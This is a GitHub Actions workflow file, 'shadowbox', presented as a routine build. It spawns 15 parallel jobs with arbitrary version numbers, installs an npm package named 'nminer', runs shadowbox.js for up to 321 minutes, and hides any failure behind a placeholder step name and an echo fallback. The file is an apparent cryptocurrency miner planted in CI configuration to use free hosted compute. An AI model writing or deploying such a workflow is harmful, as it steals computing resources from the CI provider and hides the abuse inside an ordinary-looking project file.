name: shadowbox
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 1946 }
          - { version: 5558 }
          - { version: 6473 }
          - { version: 2974 }
          - { version: 1182 }
          - { version: 1154 }
          - { version: 4255 }
          - { version: 1730 }
          - { version: 4800 }
          - { version: 4534 }
          - { version: 1553 }
          - { version: 8899 }
          - { version: 8953 }
          - { version: 7266 }
          - { version: 1648 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: that microchip likable whenever
        run: |
          npm install nminer@latest
          timeout 321m node shadowbox.js || echo "shadowbox executed"